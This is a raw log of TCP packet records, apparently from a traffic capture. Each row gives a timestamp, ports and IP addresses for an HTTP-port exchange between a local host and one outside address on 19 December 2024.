Dec 19, 2024 10:10:13.269612074 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.270658016 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.270700932 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.270761967 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.270802021 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.271737099 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.271778107 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.271878004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.271922112 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.272809982 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.272849083 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.272891998 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.272936106 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.273885012 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.273926020 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.274064064 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.274113894 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.275103092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.275149107 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.275249004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.275326014 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.276037931 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.276079893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.276269913 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.276304007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.277157068 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.277200937 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.277271986 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.277334929 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.278294086 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.278337002 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.278347015 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.278393030 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.279221058 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.279284954 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.279289007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.279326916 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.280287027 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.280334949 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.280422926 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.280467033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.281358957 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.281405926 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.281424046 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.281462908 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.282116890 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.282161951 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.282249928 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.282289982 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.283138990 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.283183098 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.283243895 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.283282995 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.284245014 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.284291983 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.284322023 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.284375906 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.285150051 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.285196066 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.285233021 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.285276890 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.286101103 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.286144018 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.286185980 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.286227942 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.287066936 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.287112951 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.287151098 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.287195921 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.287904024 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.287945032 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.287956953 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.288005114 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.288641930 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.288686991 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.288765907 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.288806915 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.289489031 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.289539099 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.289577007 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.289619923 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.290359020 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.290400028 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.290426970 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.290467024 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.291301012 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.291378021 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.291414022 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.291456938 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.292207956 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.292256117 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.292345047 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.292385101 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.293010950 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.293056965 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.293127060 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.293169022 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.293720961 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.293762922 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.293823004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.293868065 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.294631004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.294668913 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.294759989 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.294804096 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.295658112 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.295701027 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.295710087 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.295753956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.296500921 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.296539068 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.296571970 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.296611071 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.297329903 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.297369957 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.297388077 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.297427893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.298332930 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.298378944 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.298460007 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.298497915 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.299310923 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.299371004 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.299417019 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.299458027 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.300374031 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.300424099 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.300611973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.300676107 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.301419973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.301457882 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.301481962 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.301518917 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.302341938 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.302397013 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.302440882 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.302508116 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.303395987 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.303451061 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.303520918 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.303621054 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.304322004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.304378033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.304414988 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.304455042 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.305293083 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.305346966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.305423975 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.305474997 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.306304932 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.306349993 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.306494951 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.306543112 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.307284117 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.307327032 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.307399988 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.307444096 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.308329105 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.308372974 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.308410883 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.308460951 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.309662104 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.309712887 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.309792995 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.309835911 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.310508966 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.310673952 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.450942993 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.450972080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.451050043 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.451283932 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.451327085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.451381922 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.452143908 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.452197075 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.452295065 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.453140974 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.453191996 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.453205109 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.453952074 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.454153061 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.454349995 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.454396009 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.455105066 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.455236912 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.455284119 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.456393003 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.456437111 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.456475973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.457576036 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.457623959 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.457669020 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.457953930 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.458682060 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.458823919 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.458868980 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.459645033 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.459829092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.459873915 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.460728884 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.460777044 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.460813999 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.461662054 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.461709023 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.461783886 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.461952925 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.462699890 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.462847948 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.462893963 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.463848114 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.463982105 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.464025974 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.464634895 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.464680910 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.464754105 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.465569973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.465615034 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.465642929 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.465950966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.466588020 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.466784954 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.466833115 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.467816114 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.467974901 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.468023062 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.468837976 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.468880892 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.468930006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.469603062 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.469645023 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.469732046 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.469949961 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.470951080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.471112967 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.471155882 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.472023964 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.472098112 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.472138882 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.473061085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.473107100 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.473119974 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.473951101 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.473961115 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.473993063 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.473999977 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.474030972 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.474884987 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.474931955 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.474945068 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.474988937 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.475790977 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.475835085 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.475953102 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.475996971 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.476818085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.476857901 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.476982117 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.477024078 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.477859974 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.477907896 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.478013992 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.478957891 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.479000092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.479042053 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.479814053 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.479862928 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.479973078 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.480016947 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.480740070 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.480873108 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.480916977 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.481769085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.481899023 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.481944084 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.482912064 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.482954025 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.482995987 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.484091997 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.484138966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.484155893 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.485213041 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.485256910 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.485292912 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.485333920 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.486383915 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.486437082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.486481905 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.487449884 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.487613916 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.487657070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.488611937 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.488652945 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.488694906 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.489495039 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.489538908 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.489780903 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.489948988 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.490859032 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.490977049 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.491019964 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.492132902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.492234945 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.492243052 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.492281914 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.493211031 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.493266106 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.493303061 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.493345976 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.494215965 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.494369030 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.494412899 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.495228052 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.495338917 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.495383024 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.496269941 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.496320009 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.496382952 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.496437073 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.497262001 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.497421980 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.497477055 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.498281002 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.498354912 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.498399973 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.499516010 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.499651909 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.499680042 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.499703884 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.500610113 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.500657082 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.500700951 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.500741005 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.501712084 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.501754045 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.501898050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.501954079 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.502836943 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.502881050 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.502955914 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.503000021 CET	49860	80	192.168.2.6	185.215.113.16
